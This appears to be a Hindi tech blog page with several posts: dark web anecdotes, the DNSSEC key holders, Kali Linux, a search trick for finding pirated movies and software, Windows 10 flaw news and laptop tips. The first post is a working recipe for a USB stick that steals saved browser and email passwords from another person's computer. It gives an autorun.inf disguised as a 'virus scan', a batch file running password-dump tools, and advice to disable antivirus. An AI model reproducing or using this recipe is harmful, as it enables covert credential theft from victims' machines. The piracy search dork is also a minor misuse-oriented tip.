Tuesday, 27 February 2018

How to make a password storing pen drive

- No comments

Laptop se password uthane wali pendrive kaise bnaye

Hello Oll portal ke pathko, 😎😎
            आज मैं फिर से आपके लिए लाया हूं एक बहुत ही बेहतरीन पोस्ट इस पोस्ट को पढ़कर आपको ऐसा लगेगा कि आपको कुछ ऐसा आता है जो दूसरों को नहीं आता और इससे आप अपने लैपटॉप या फिर कंप्यूटर को और ज्यादा सुरक्षित कर पाओगे आज मैं आपको इस पोस्ट में बताऊंगा उसे आप दो तरह से यूज कर सकते हैं. या तो अच्छी तरह से या बुरी तरह से यह आपके ऊपर डिपेंड करता है क्या आप मेरी इस पोस्ट का इस्तेमाल कैसे करोगे मैं किसी भी चीज के लिए जिम्मेदार नहीं होऊंगा आप जो कुछ करेंगे अब आप अपनी मर्जी के साथ करेंगे. मैं यह पोस्ट सिर्फ और सिर्फ आप लोगों को कुछ सिखाने के लिए लिख रहा. कोई भी व्यक्ति जिसे सामान्य ज्ञान है लैपटॉप और कंप्यूटर के बारे में वैसे बड़े आराम से कर लेगा और अपने आप को बचा भी लेगा 
           इस पोस्ट में मैं आपको बताऊंगा कि आप कैसे किसी सिर्फ एक पेन ड्राइव की मदद से किसी के पूरे लैपटॉप या फिर कंप्यूटर के अंदर जितने भी stored पासवर्ड (paswords) है उन्हें केवल 2 सेकेंड में अपनी पेन ड्राइव के अंदर कैसे डाले. यह काम सुनने में जितना आसान है उतना ही करने में भी आसान है मैं इस पोस्ट के आखिर में यह भी बताऊंगा कि आप अपने लैपटॉप और कंप्यूटर को इस से कैसे बचाएं. इसे करने के लिए आपको नीचे लिखे गए सामान की आवश्यकता होगी/. 

सामान की आवश्यकता:- 

  1. सबसे पहले आपके पास पेन ड्राइव का होना जरूरी है. जैसे किसी भी साइज की हो चलेगा 
  2. एक कंप्यूटर या लैपटॉप. 
  3. Messen Pass.EXE: यह आपके उन पासवर्ड को रिकवर करेगा जो सबसे ज्यादा चर्चा में है मतलब पॉपुलर है. 
  4. Mail PassView:.EXE: यह आपके ईमेल प्रोग्राम्स के पासवर्ड स्टोर करने में मदद करेगा जैसे Yahoo MessengerETC. 
  5. IE Passview:.EXE: यह ऐसा छोटा प्रोग्राम है जो आपको वह पासवर्ड दिखाएगा जो आपके इंटरनेट एक्सप्लोरर में सेव है और ऐसे बहुत कम लोग होंगे जो इंटरनेट एक्सप्लोरर चलाते होंगे. 
  6. Protected Storage PassView: यह फोन  पासवर्ड को उठाने में मदद करेगा जो आपके लैपटॉप की या कंप्यूटर की स्टोरेज के अंदर सेव होते .जैसे Facebook के पासवर्ड आदि. 
  7. PasswordFox.EXE: यह आपके फोन पासवर्ड को सेव करने में मदद करेगा जो मोज़िला फ़ायरफ़ॉक्स वेब ब्राउज़र में SAVE होते हैं. यह भी एक छोटा सा सॉफ्टवेयर है जो यूज़रनेम भी दिखाएगा 
how tom make password storing pendrive.

करने से पहले एंटीवायरस को थोड़ी देर के लिए डिसेबल कर दे 

पासवर्ड स्टोर करने वाली पेन ड्राइव कैसे बनाएं:- 

  1. ऊपर लिखे हुए सभी सॉफ्टवेयर को डाउनलोड करें और EXTRACT कर ले अपनी पेन ड्राइव में 
  2. फिर नोटपैड खोलें और वहां पर टाइप करें [autorun] open=launch.bat ACTION= Perform a Virus Scan अब SAVE AS पर क्लिक करें और उसका नाम autorun.inf रख दे. यह करने के बाद इस नोट बेड वाली फाइल को पेन ड्राइव में कॉपी कर ले. 
  3. अब एक और नोटपैड फाइल बनाएं और उसमें लिखें start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt यह लिखने के बाद SAVE AS पर क्लिक करें और उसे नाम launch.bat दे सर इस फाइल को पेन ड्राइव में कॉपी करें 
7 people who can restart Internet ||hindi||
यह सब करने के बाद आपकी पेन ड्राइव तैयार है जिसे अब किसी के भी कंप्यूटर लैपटॉप के साथ लगाएंगे तो आपको उस कंप्यूटर या लैपटॉप के अंदर के सभी पासवर्ड दिखा देगी. 

आप अपने पेन ड्राइव को किसी लैपटॉप के साथ लगाएं फिर परफॉर्म वायरस SCAN पर क्लिक करें. अब आपके सभी दोस्त चुपचाप काम करना शुरू हो जाएंगे हो जाएंगे इसमें बहुत ही कम समय लगेगा सभी पासवर्ड एक टेक्स्ट(.TXT) फॉर्मेट में SAVE होंगे.  अपनी पेनड्राइव को वहां से रिमूव कर दें और अपने लैपटॉप पर लगा कर देखें उसके अंदर SAVE हुए पासवर्ड.
Note:-यह पूरी पोस्ट सिर्फ आप सब का ज्ञान बढ़ाने के लिए लिखी गयी है. आप इसका जिस भी तरीके से इस्तेमाल करेंगे उसके लिए इस पोस्ट या ब्लॉग का राइटर जिम्मेदार नहीं होगा। 
Tags:-how to,pen drive, password ,fetching,storing,solution,vulnerable,laptop,computer,recovery
All about Dark web and stories ||Hindi|| 

Sunday, 25 February 2018

All about Dark web and stories ||Hindi||

- No comments

Dark web ki puri jankari

Hello Oll portal ke pathko,
         आज मैं फिर से आपके लिए एक बहुत ही बढ़िया और एक मनोरंजक पोस्ट लेकर आया हूं और मैं आपको के साथ कह सकता हूं कि यह सब जानकर आपको ऐसा लगेगा कि आप बाकी लोगों से कुछ अलग हो काफी लोगों को इसके बारे में कुछ पता ही नहीं है और मैं यह भी कह सकता हूं कि पूरी पोस्ट को लिखने में मेरी काफी मेहनत लगी है पर मैंने कोशिश की है कुछ लिखते समय उसे ऐसा बनाओ कि पढ़ने वाला उसमें खो जाए. आज हम बात करेंगे DARK WEB OR DEEP WEB के बारे में 
                           जैसे कि इसके नाम से ही पता लग रहा है की यह कोई पैसे जगह होगी इंटरनेट पर यहां पक्का कोई गलत काम हो रहे होंगे जो हम सोच भी नहीं सकते हैं. इंटरनेट एक बहुत ही बड़ी जगह है इतनी बड़ी कि हम सोच भी नहीं सकते यहां अगर Facebook Flipkart Amazon जैसी वेबसाइट है इनके अलावा और वेबसाइट भी हो सकती है जो शायद उनकी तरह यूजर फ्रेंडली ना हो. ऐसे ही पूरे इंटरनेट में एक जगह है जिसे DARK WEB OR DEEP WEB कहते हैं और यह किसी का सॉफ्टवेयर के द्वारा ही आप ACCESS कर सकते हैं 
how to access dark web

आखिर क्या है DARK WEB:- 

यह कैसा शब्द है जो उन वेबसाइट्स के संगठन को दे दिया गया है जो काफी ज्यादा एंक्रिप्टेड ENCRYPTED है और सिक्योर है. यह इतने ज्यादा सिक्योर और एंक्रिप्टेड है कि इन्हें किसी खास सॉफ्टवेयर के द्वारा ही एक्सेस किया जा सकता है और नॉर्मल इंजन सर्च इंजन के द्वारा एक्सेस नहीं किया जा सकता. अब इससे यह तो पता लग गया है कि इन वेबसाइट पर जाना कानूनी तौर पर गलत है वरना यह WEBSITES नॉर्मल सर्च इंजन के द्वारा सर्च की जाति.जितने भी वेबसाइट है जो DARK WEB पर है वह अपनी पहचान TOR ENCTYPTION TOOL की मदद से छुपाता है. 
How to search any movie,software etc on google with one click.
         जिन लोगों को यह नहीं पता कि दौर क्या चीज है उन्हें बता देना चाहता हूं कि TOR एक ऐसा ब्राउज़र है जो आपकी पहचान को छुपा देता है और आप यहां से इंटरनेट एक्सेस कर रहे हैं उस जगह की बजाए कोई और जगह बताता है मतलब 1 तरीके से यह VPN कितना काम करता है. जब भी आप कोई वेबसाइट तोर ब्राउज़र के द्वारा एक्सेस करते हैं आपकी पहचान छुपा कर रखता है. ऐसा नहीं है कि TOR से एक ही ENCRYPTION होता है वह एंक्रिप्शन(ENCRYPTION) को भी (ENCRYPT) देता है जिससे सिक्योरिटी और ज्यादा बढ़ जाती है 
           इनसाइड जो कोई भी एक्सेस कर सकता है TOR ब्राउज़र के द्वारा पर यह पता लगाना कि इन वेबसाइट्स के पीछे कौन है बहुत ही मुश्किल है और अगर गलती से भी आपसे कोई गलती हो गई और उन्हें पता लग गया कि आप उस वेबसाइट को चला रहे हो या फिर आपने उस वेबसाइट को एक्सेस किया तुम्हें काफी खतरनाक हो सकता है. 
how to access dark web

DARK WEB को एक्सेस कैसे करें:- 

अब हमने जान लिया है कि DARK WEB होता क्या है. तो अब आप बताओ कि आप इसे एक्सेस कैसे कर सकते हैं. देखा तो यह बहुत ही आसान है सबसे पहले आपको करना होगा डाउनलोड TOR को. यह आप आसानी से ढूंढ सकते हैं Google पर उसके बाद आप tor browser का bundle डाउनलोड कर चुके होंगे. अपने सभी जरूरत के औजार पड़े होंगे अब आप उस downloaded फाइल को open करें और एक्सट्रैक्शन लोकेशन सेलेक्ट करें फिर उस फोल्डर को खोलें जहां पर आपने उसे extract टिअरा अब तोर ब्राउज़र पर क्लिक करें बस अब आप का TOR ब्राउज़र चल पड़ा. उसका VIDALIA CONTROL PANEL खुद ब खुद बाकी काम जो आपकी ID पहचान छुपाने का है. जब यह तैयार हो जाएगा तबीयत खुद-ब-खुद खुलेगा. अगर आप इसे बंद करना चाहे तो TOR BROWSER बंद कर दें ताकि आप नेटवर्क से डिस्कनेक्ट हो जाएं. 
           हमेशा याद रखें यह एक चीज कि DARK WEB चलाते वक्त हमेशा अपने वेबकैम पर टेप लगाएं ताकि कोई आपके माध्यम से आपको देख ना पाए और TAPE टेप ट्रांसपेरेंट ना हो. यह मुश्किल नहीं है कि आप इसे एक्सेस कैसे करें बल्कि मुश्किल की बात यह है कि आप एक्सेस करने के बाद क्या करें. यह काम आप पर छोड़ता हूं कि आप क्या चलाएं हो सकता है कि आप सिर्फ एक क्लिक की दूरी पर हो किसी खतरनाक WEBSIT के जिसके बारे में आपने कभी सोचा भी ना हो. तुम फ्री कब होगी आप हमेशा संभाल कर चलाएं और कोशिश करें कि आप इसे चलाएं ही ना. अगर आपको चलानी है तो मैं आप को बता देता हूं आपको और REDDIT पर कुछ ना कुछ जरूर मिल जाएगा वरना HIDDEN WIKI पर मिल जाएगा. पर मैं आपको अभी भी यह कहूंगा कि आप इसे ना चलाएं क्योंकि सावधानी हटी दुर्घटना घटी.यह WEBSITES समय-समय पर बर्बाद करती जाती है क्योंकि यह बहुत ही खतरनाक है 
how to access dark web

कुछ खतरनाक कहानियां DARK WEB कि:- 

1.एक बार कोई व्यक्ति tor browser चलाने के बाद बर्गर खाने बाहर गया और जब वापस आया तो उसने देखा कि किसी ने उसकी बर्गर खाते हुए की तस्वीरें भेजी थी. ऐसा हुआ REDDIT USER CLETCH के साथ. 

2.Reddit user Bigwiseguy55 " मैंने एक बार किसी की वीडियो पर कमेंट किया और जब मैं थोड़ी देर बाद उस वीडियो को दोबारा देखने पहुंचे तो मैंने देखा किसी ने रिप्लाई किया था मेरे कमेंट का और उसने साथ में मेरा लास्ट नेम भी लिखा था पर मैं रोशनी बहुत ही कम बदनाम हुआ था और ना ही कमेंट से टाइम देख रहा था" 

3.Reddit user IAmASharkFin:" एक बार जब मैं TOR BROWSER चला रहा हूं तब मैंने देखा कि वहां पर एडवर्टाइजमेंट है और वह एडवर्टाइजमेंट थी किसी हिटमैन(HITMAN) की जो बिटकॉइन(BITCOIN) लेकर काम करता था. 

4.From Reddit user Semper_Fi_Cerberus:"यह गहरी वेब पर मेरी तीसरी बार थी और मैं सिर्फ साइटों पर ही देख रहा था मुझे यह एक आदमी का होम पेज मिला और साइडबार पर मैंने एक लिंक देखा जो 'पत्रकार और गहरे वेब पर नए लोगों के लिए' कहा गया था। मैंने इस पर क्लिक किया, यह उम्मीद कर रहा था कि यह दिलचस्प और उपयोगी जानकारी थी। एक नया पृष्ठ खोला और एक चित्र लोड करना आरंभ हुआ। मेरी धीमी गति के लिए ईश्वर का शुक्र है क्योंकि जो कुछ लोड किया गया वह एक पुरानी एशियाई [इस प्रकार का] आदमी था जिसकी ठोड़ी पर रक्त के साथ। मैं लोड की गई छवि के बाकी होने से पहले टैब को तुरंत बंद कर दिया। आज तक मुझे आश्चर्य है कि पूरी तस्वीर क्या थी, लेकिन एक ही समय में आभारी मैं इसे देख नहीं पाया". 

5.Reddit user digikun muses "एक पृष्ठ को एक सादे HTML पासवर्ड फ़ील्ड के साथ चित्र करें और बटन दबाएं। अगर आप कुछ गड़बड़ लिखते हैं, तो पृष्ठ बस फिर से वापस ऊपर आता है। कोई त्रुटि संदेश नहीं, कुछ भी नहीं।

"अब DARK WEB पर इन अज्ञात, रिक्त प्रवेश स्क्रीन के सैकड़ों तस्वीर"

" उनके पीछे क्या था आप सोच सकते हैं?" 

अगर आप और भी कुछ जानना चाहते हैं तो आप नीचे कमेंट में लिखें
                     Note:-  जो कुछ भी यहाँ पर बताया गया है वो सिर्फ ज्ञान के लिए बताया गया है अगर कोई भी गलत काम करते है यह सब जान ने के बाद तोह इसके जिम्मेदार आप खुद होगे। इस ब्लॉग का राइटर नहीं। 
Tags:- dark web,educational,2018,what,how to,deep,stories,creepy,funny,true
7 people who can restart Internet ||hindi||

Saturday, 24 February 2018

7 people who can restart Internet ||hindi||

- No comments

7 Log Jo kr sktey hai internet ko restart

Hello Oll portal ke pathko,
          आज  फिर से आपके लिए लाया हूं एक नई बहुत ही मजेदार पोस्ट इस पोस्ट के बारे में सबसे खास यह है बहुत ही कम लोग होंगे जिन्हें वह चीज पता होगी जो इस पोस्ट में लिखी गई है और मैं ओके तौर पर कह सकता हूं कि अगर आप अपने आपको टेक्नोलॉजी में काफी आगे लेकर जाना चाहते हैं तो आपको यह जरूर जानना होगा कि दुनिया में ऐसे 7 लोग हैं जिनके पास कुछ ऐसे codes या keys है जो पुरे इंटरनेट को वर्ल्ड वाइड वेब को चुटकियों में restart कर सकता है. इसके बारे में मैं विस्तार में आगे बताऊंगा. 
                         मैं जानता हूं कि यह सब सुनने में किसी की बहुत ही हाई टेक्नोलॉजी based फिल्म की तरह लग रहा होगा पर यह सच है दुनिया में ऐसे 7 लोग हैं जिनके 7 चाबियां जो छुट्टियों में पूरे इंटरनेट को दुबारा से शुरू कर सकती हैं मतलब restart कर सकते हैं किसी बहुत खतरनाक हादसे के समय उन 7 लोगों को अपनी keys के साथ एक बहुत ही खुफिया जगह और सुरक्षित जगह पर मिलकर master key को recover करना होगा जिससे वह पूरे इंटरनेट को पूरे वर्ल्ड वाइड वेब को रिस्टार्ट कर. 

उन साथियों के नाम नीचे लिखे गए हैं:- 

Kisi bhi movie ,software etc ko 30 sec mein kaise dhoonde
असल में बात कुछ यूं है यह कंप्यूटर साइंटिस्ट की टीम थी जिन्होंने एक सिक्योरिटी सिस्टम बनाया जिसका नाम था DNSSEC इसका मेन मकसद था यह पता करना कि साइट वही हो जो वह खुद को बताती है. जिन्हें हम KEYS कह रहे हैं वह असल में SWIPE CARD. लोगों का चुनाव इसलिए हुआ था ताकि लोगों को भरोसा दिलाया जा सके कि अगर कोई भी खतरनाक परिस्थिति घटती है तब भी वर्ल्ड वाइड वेब(INTERNET) रुकेगा नहीं और चलता रहेगा यह सिर्फ उन साइटों पर काम कर पायेगा जो DNSSEC इस्तेमाल कर रही हैं. पर यह बात अलग है इसके अलावा और दूसरी चीजें सोचने का अलग ही मजा है जैसे फिल्म्स में दिखाया जाता है. 
what is internet
               
इस पूरी पोस्ट है मैंने जो कुछ भी बताया है उसमें से कुछ बातों का अभी भी इनकार किया जा रहा है ऐसा कुछ भी नहीं है ऐसी कोई स्वाइप कार्ड नहीं है. आख़िर सच क्या है यह समय आने पर ही पता लगेगा तो इस समय कुछ कह नहीं सकते कि ऐसा कुछ है भी या नहीं मुझे तो लगता है कि ऐसा जरूर कुछ है और वह हमसे छुपाने की कोशिश कर रहे हैं 
               आपको क्या लगता है ??अपनी सोच के बारे में कमेंट बॉक्स में लिखें
Tags:-  7 keys,internet,2018,access,fun,hidden,question,answer
Benefits of Kali Linux Over windows  

Friday, 23 February 2018

Benefits of Kali Linux Over windows

- No comments

Kali linux windows se behtar kyo hai

Hello oll Portal visitors,
             आज मैं आपके लिए फिर से एक बहुत ही बेहतरीन पोस्ट लेकर आया हूं जो आपके बहुत काम आएगी और मुझे लगता है कि हर किसी को इन बातों के बारे में जानना चाहिए कि आखिर kali linux windows से बेहतर क्यों है. कभी हंसते लोगों को पता है कि काफी अलग अलग तरह के ऑपरेटिंग सिस्टम इस समय आ चुके हैं जिनमें विंडोज और लिनक्स काफी पुराने है और सबसे बेहतरीन इन दोनों के बीच भी देखा है तो लाइक सबसे बेहतर है ऐसी चीज है जो हम Windows पर नहीं कर सकते क्योंकि Windows एक ओपन सोर्स ऑपरेटिंग सिस्टम नहीं है पर लाइनेक्स है जैसे की हम सब लोगों को काफी पता है की लाइनें सही बहुत ही dynamic प्लेटफॉर्म है इसका इस्तेमाल बढ़ता ही जा रहा है और हमें काफी सिक्योर इन्वायरमेंट प्रोवाइड करता है. 
which is better kali linux or windows
                       काली लिनक्स आया था 13 मार्च 2013 में यह एक debian based डिस्ट्रीब्यूशन है इसका मेन मकसद है एडवांस पेनेट्रेशन(penetration) टेस्टिंग एंड सिक्योरिटी ऑडिटिंग की सुविधा देना अपने यूजर्स को. लाइनेक्स काफी मदद करता है लोगों कि सिक्योरिटी बढ़ाने में. यह बनाया गया है औ इसे मेंटेन भी offensive security wale krte hai. यह काफी बड़ी कंपनी है ओरियन सिक्योरिटी प्रोवाइड करती है लोगों को इंटरनेट पर 

अब मैं आपको बताऊंगा कि इसके क्या-क्या फायदे हैं:- 

1.Advanced penetration test करने के लिए सॉफ्टवेयर 


ऑपरेटिंग सिस्टम में 600 से भी ज्यादा ऐसे औजार हैं जो पेनिट्रेशन टेस्टिंग में मदद करते हैं. जैसे BACK TRACK में पहले काफी TOOLS  बार बार दोहराए हुए थे वैसा इसमें नहीं है. 

2.FREE LINUX TOOLS 

यह एकदम फ्री है इसमें कोई सी भी तरह का कोई पैसा नहीं देना पड़ता किसी भी सॉफ्टवेयर के लिए या किसी भी टूल के लिए कोई भी TOOL कोई भी यूजर बड़ी आसानी से इस्तेमाल कर सकता है कोई पैसा नहीं देना पड़ता. यह एक बहुत ही बड़ा कारण है कि लाइनेक्स मुझे खुद Windows से बेहतर लगती है. 

3.OPEN SOURCE GIT TREE 

यह ओपन शॉट सिस्टम है और कोई भी गुजर आसानी से एक्सेस कर सकता है. जितने भी कोड है इसके अंदर वह कोई भी बिना परेशानी के देख सकता है. और OPEN DEVELOPMENT TREE आसान बना देता है कोडिंग की डेवलपमेंट को देखने के लिए स्टेप बाय स्टेप. 

4.FHS SUPPORT 

कालिका फाइल सिस्टम HIERARCHY के स्टैंडर्ड पर बना है जिससे इसके यूज़र्स बड़ी आसानी से अपनी फाइल्स को,BINARIES आदि को बड़ी जल्दी ढूंढ सकते हैं. यह एक बहुत ही बढ़िया FEATURE  है. जिसकी वजह से यह बाकी ऑपरेटिंग सिस्टम से आगे है. 

5.WIRELESS मदद 

इसमें बहुत ही बढ़िया और अद्भुत चीज यह है कि आप इसे एक ही समय पर एक से ज्यादा वाई फाई (WI-FI) के साथ कनेक्ट कर सकते हैं. यह से माधुरी जाता है कि काफी ज्यादा वैराइटी वाले हार्डवेयर के ऊपर जिसके कारण यह काफी सारे वायरलेस और यूएसबी पोर्ट के साथ कंपेटिबल बन जाता है. 

6.KALI IS LINGUISTIC 

यह किसी भी लैंग्वेज पर काम कर सकता है चाहे वह हिंदी है या उर्दू है अरेबियन है कोई भी हो यह भी एक से काफी बड़ा कारण है बाकी ऑपरेटिंग सिस्टम से बेहतर होने का इसके सभी टूल्स भी लिंगविस्टिक है मतलब और भी कई भाषाओं में उपलब्ध है. 

7.ARMEL AND ARMHF को SUPPORT करता है 

जैसे ARM BASED सिंगल बोर्ड के सिस्टम जैसेRASPERRY PI आदि काफी सस्ते और बढ़ते जा रहे हैं तो काली लाइनेक्स के ARM सपोर्ट जरूरत है उसकी वह मजबूत बने ठीक MANAGEMENT TOOL जैसे जो ठीक से काम करें और अच्छे से इंस्टॉल हो दोनों ARMEL और ARMHF सिस्टम पर

अब आप बताएं कि kali linux बेहतर है या Windows और देखते हैं कि कौन जीत ता  है। 

Tags:-benefits,kali linux,windows,operating system,best top

Kisi bhi movie ,software etc ko 30 sec mein kaise dhoonde

How to search any movie,software etc on google with one click.

- No comments

Kisi bhi movie ,software etc ko 30 sec mein kaise dhoonde

Hello Oll portal ke pathko,
               तो दोस्तों आज फिर से मैं आपके लिए एक लेकर आया हूं खतरनाक पोस्ट मैं आपको बताऊंगा कि आप कैसे किसी भी चीज को मात्र 30 सेकेंड के अंदर google पर कैसे ढूंढे डाउनलोड करने के लिए यह कोई ट्रिक किया है कि नहीं बहुत ही सिंपल सी चीज है जो काफी समय पहले इस्तेमाल की जाती है पर धीरे-धीरे लोग इसे इस्तेमाल करना भूल गए वह भूल गए कि ऐसी भी कुछ चीज़ थी जिससे हम किसी भी चीज को गूगल पर एकली फाइंड कर सकते हैं. 
                  हम सुबह कभी ना कभी Google पर कोई चीज ढूंढने में काफी दिक्कत होती है जैसे मानो अगर कोई सॉफ्टवेयर आपको चाहिए क्या वह काफी पहले वहां पर सर्च बार में लिखना पड़ता है कि आपको यह कौन सा सॉफ्टवेयर चाहिए फिर आपको site खोलने पड़ती है. फिर आप वहां पर अपना सॉफ्टवेयर ढूंढते हैं जो कई बार आपको उधर ही मिल जाता है तो कोई बार नहीं फिर आप दोबारा Google पर जाते हैं वहां पर दोबारा लिखते हैं और किसी को साइट पर अपने सॉफ्टवेयर को ढूंढते हैं कई बार इस चक्कर में आप गलती से कोई वायरस भी इंस्टॉल कर लेते हैं 

avengers infinity war
                जैसे कुछ दिन पहले की बात है मेरे किसी दोस्त ने कोई सॉफ्टवेयर डाउनलोड करना था और उसे कहीं से मिल नहीं रहा था तो उसने सचिवालय लिखा सॉफ्टवेयर के बारे में और इधर उधर कहीं साइटों पर घूमता रहा अगर मैं जयपुर से सॉफ्टवेयर मिल गया और उसने उसको डाउनलोड करके इंस्टॉल करने की कोशिश की उसे पता लगा कि वह तो वायरस था जिसकी वजह से उसका लैपटॉप हैंग हो गया. और कम से कम उसे अपना लैपटॉप ठीक करने में और वायरस को हटाने में एक या 2 घंटे लग गए. इसीलिए मैं कहता हूं एप्लीकेशन डाउनलोड ध्यान से करना चाहिए वरना कई बार हालात इस से भी बदतर हो जाते हैं tevar ऐसे ही अनजाने में कोई गलत सॉफ्टवेयर इंस्टॉल कर लेने से आपका सिस्टम hack भी हो सकता है 
                  पर मेरे इस सर्चिंग की मेथड method से मैं 100% sure कि आपको कोई मुसीबत का सामना नहीं करना पड़ेगा आपको बस मेरे नीचे लिखे गए निर्देशकों(instructions) को पढ़ना पड़ेगा 

किसी सॉफ्टवेयर या फिर फिल्म आदि को ढूंढने का सबसे बेहतरीन तरीका:- 

  1. पहले चेक करें कि आपका मोबाइल या फिर PC/laptop इंटरनेट के साथ जुड़ा (connected) है या नहीं.
  2. पहले तो आप Google खोलें अपने मोबाइल या फिर PC/laptop पर 
  3.  अब सर्च बार(search bar) पर क्लिक करें और लिखें "intitle:index:of?mkv ****" बिना quotes(") के 
 
Note:- mkv की जगह आप उस चीज का फॉर्मेट लिखें जो आप ढूंढ रहे हैं
जैसे अगर कोई फिल्म ढूंढ रहे हैं तो लिखें MKV या MP4.
अगर कोई सॉफ्टवेयर ढूंढ रहे हैं LAPTOP/PC के लिए तो EXE लिखें.
अगर कोई सॉफ्टवेयर ढूंढ रहे हैं ANDROID के लिए तो APK लिखें.
इसी तरह बाकी फॉर्मेट लिखें. 

Note:- **** की जगह आप उस फिल्म या फिर सॉफ्टवेयर का नाम लिखें जिसे आप डाउनलोड करना चाहते हैं.  जैसे black panther आदि example:- intitle:index:of?mkv black panther

Tags:- how to,search,optimize,latest,fast,movie,high,quality,infiny,war,movie,software,pdf,windows,android,tips,fun,news,hidden,interesting whatsapp,solution,problem,internet

New Security flaw in window 10 ||2018|| ||Hindi mein||

Thursday, 22 February 2018

New Security flaw in window 10 ||2018|| ||Hindi mein||

- No comments

Window 10 mein mila nya Security flaw

Hello Oll Portal ke pathko,
               आज फिर से मैं आपके लिए एक बहुत ही बेहतरीन खबर लिख रहा हूं और मुझे उम्मीद है कि आपको यह खबर भी बहुत अच्छी लगेगी और यह खबर खास तौर पर उन लोगों के लिए है जो अभी Windows 10 इस्तेमाल कर रहे हैं. आमतौर पर हम सभी आजकल window 10 इस्तेमाल कर रहे हैं जो हम सब को काफी पसंद आई पर windows 10 मैं कुछ कमियां हैं और वह भी बहुत बड़ी. यह कमियां है security को लेकर. 
window 10 flaw solution            दरअसल बात कुछ ऐसी है कि google कि एक सिक्योरिटी सर्च टीम होती है Project Zero नाम की जो Windows और इसके अलावा कई एप्लीकेशंस के flaws कमियां ढूंढती है और कंपनी को 90 दिन का मौका देती है कि 90 दिन के अंदर वह अपनी कमी को सुधार ले. 

                 उन्होंने हाल ही में नवंबर में Microsoft को बताया था कि उनकी WIndows 10 में दो कमियां है मतलब की 2 flaws है जो काफी critical हैं. इनमें से एक को तो microsoft ने (patch) ठीक कर दिया पर दूसरा ठीक ना कर सके. इस कमी के कारण कोई भी नॉर्मल यूजर एडमिनिस्ट्रेटर कि privilege हासिल कर सकता है system मैं माइक्रोसॉफ्ट ने इसे "important" rate किया ना के क्रिटिकल क्योंकि इसे remotely exploit नहीं कर सकते. पर फिर भी यह बहुत जरूरी है कि Microsoft इसे जल्दी से जल्दी ठीक करें क्योंकि ऐसा बहुत कुछ है जो इस छोटे से security flaw के कारण हो सकता है. जो मैं किसी कारण यहां पर नहीं बताऊंगा 
           अभी तक माइक्रोसॉफ्ट ने बताया नहीं है कि वह कब इसे ठीक करेंगे या फिर ठीक करेंगे भी या नहीं. और उन्हें तो अभी EDGE VULNERABILITY को भी ठीक करना है जो भी 1 हफ्ते पहले Google NE बताई थी. गूगल और माइक्रोसॉफ्ट के बीच काफी बहस होती रहती हैं वह दोनों एक दूसरे की खामियां देखती है और एक बताती हैं एक दूसरे को अगर वह ठीक ना कर पाए तो वह खामियां पब्लिक को भी बता देते हैं पिछले साल microsoft NE गूगल क्रोम में एक FLAW दिखाना जिसे Google में काफी जल्दी ठीक कर दिया है 
Kisi aur ke CCTV camera ki footage kaise dekhe
   लोग Google की 90 देने वाली पॉलिसी को काफी पसंद भी करते हैं और इसकी काफी निंदा भी करते हैं ऐसे काफी सबूत है जिससे हम कह सकते हैं कि Windows में सिक्योरिटी वल्नेरेबिलिटी बढ़ती जा रही है और यह साफ दिख रहा है कि माइक्रोसॉफ्ट इन वल्नेरेबिलिटी को मुश्किल से ठीक कर पा रहा है और इसके विपरीत Google काफी अच्छे सॉफ्टवेयर बना रहा है जो काफी सिक्योर है google अब कमर्शियल इंटरेस्ट में भी शामिल हो रहा है और Google कि यह टीम प्रोजेक्ट जीरो काफी मेहनत कर रही है दूसरी एप्लीकेशंस में वल्नेरेबिलिटी ढूंढने में. 
               ऐसा कहते हैं कि Google कि यह टीम तब बनाई गई थी जब Google को 2009 में HACK करने की कोशिश की गई थी जिसका ब्लेम इंटरनेट एक्सप्लोरर डाल दिया गया था क्योंकि उसमें कोई UNPATCHED SECURITY FLAW था
windows 10  bug solution


Tags:- latest,security, flaw,in,window, 10,windows 10,2018,how to,solution,fixed,patch,google,new,technology,bored,way,easy,download,android
How to improve performance of a laptop ||Hindi mein||



Wednesday, 21 February 2018

How to improve performance of a laptop ||Hindi mein||

- No comments

Apney laptop ki perfomance kaise bdhaye

Hello Oll portal ke pathko,
          आज फिर में आपके लिए एक बहुत ही  अछि पोस्ट लेकर आया हु और मुझे यकीन  है.कि आप लोगों को यह पोस्ट बहुत ही अधिक पसंद आएगी यह पोस्ट खासतौर पर उन लोगों के लिए है जो लैपटॉप पर गेम खेलना पसंद करते हैं हम सबको मालूम है कि गेम रोशनी बाजार लैपटॉप पर नहीं बल्कि कंप्यूटर पर आता है और xbox /playstation आता है यह पोस्ट आपको बताएगा कि आप कैसे अपने लैपटॉप की परफॉर्मेंस बढ़ा सकते हैं जिससे कि आपका gaming एक्सपीरियंस भी बड़ा जाएगा तो वक्त को खराब ना करते हुए हम आप को सीधा बताने जा रहा हूं कि आप कैसे कैसे और किन किन तरीकों के साथ अपने laptop की परफॉर्मेंस बढ़ा सकते हैं. 


1. सबसे पहले तो आप कोशिश करें कि आप हमेशा अपना लैपटॉप साफ रखें क्योंकि साफ रखने से जो उसका मदरबोर्ड है उसके अंदर इलेक्ट्रिसिटी बहुत आसानी से पास कर सकेगी और हिटिंग की समस्या काफी कम हो जाएंगे. और हीटिंग की समस्या कम होने से आपकी लैपटॉप की परफॉर्मेंस बढ़ जाएगी. अगर लैपटॉप पर मिट्टी धूल गिरेगी तो उसे उसे मदर बोर्ड में इलेक्ट्रिसिटी पास तो होगी पर वह हिट ज्यादा प्रोड्यूस करेगी जिसके कारण लैपटॉप हैंग होना शुरू हो जाएगा.अगर एक बार heat issue आ गया तो processor,gpu etc. components काम करना कम कर देंगे 

2. दूसरी चीज जो आप कर सकते हैं लैपटॉप की स्पीड बढ़ाने के लिए वह यह कि आप अपने drivers को हमेशा अपडेट रखें एक समय होता था जब drivers को अपडेट करना एक मजाक समझा जाता था पर आज के जमाने में बहुत जरूरी हो चुका है कि हम अपने drivers को update रखें क्योंकि इससे परफॉर्मेंस में काफी फर्क पड़ता है अगर आपके पास nvidia या amd ग्राफिक कार्ड है तो आपके लिए अधिक जरूरी है कि अपडेटेड ड्राइवर हो.


